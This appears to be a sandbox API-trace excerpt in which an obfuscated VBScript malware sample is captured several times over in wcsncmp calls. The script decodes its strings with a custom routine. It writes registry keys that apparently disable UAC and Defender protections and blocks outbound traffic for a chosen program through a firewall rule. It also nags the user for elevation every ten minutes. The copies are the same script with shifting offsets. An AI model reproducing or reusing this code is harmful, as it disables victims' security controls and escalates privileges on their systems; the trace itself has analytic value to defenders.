CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 94 [0222.929] wcsncmp (_String1="ey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0222.929] wcsncmp (_String1="y = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 108 [0222.929] wcsncmp (_String1=" = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0222.929] wcsncmp (_String1="= \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add 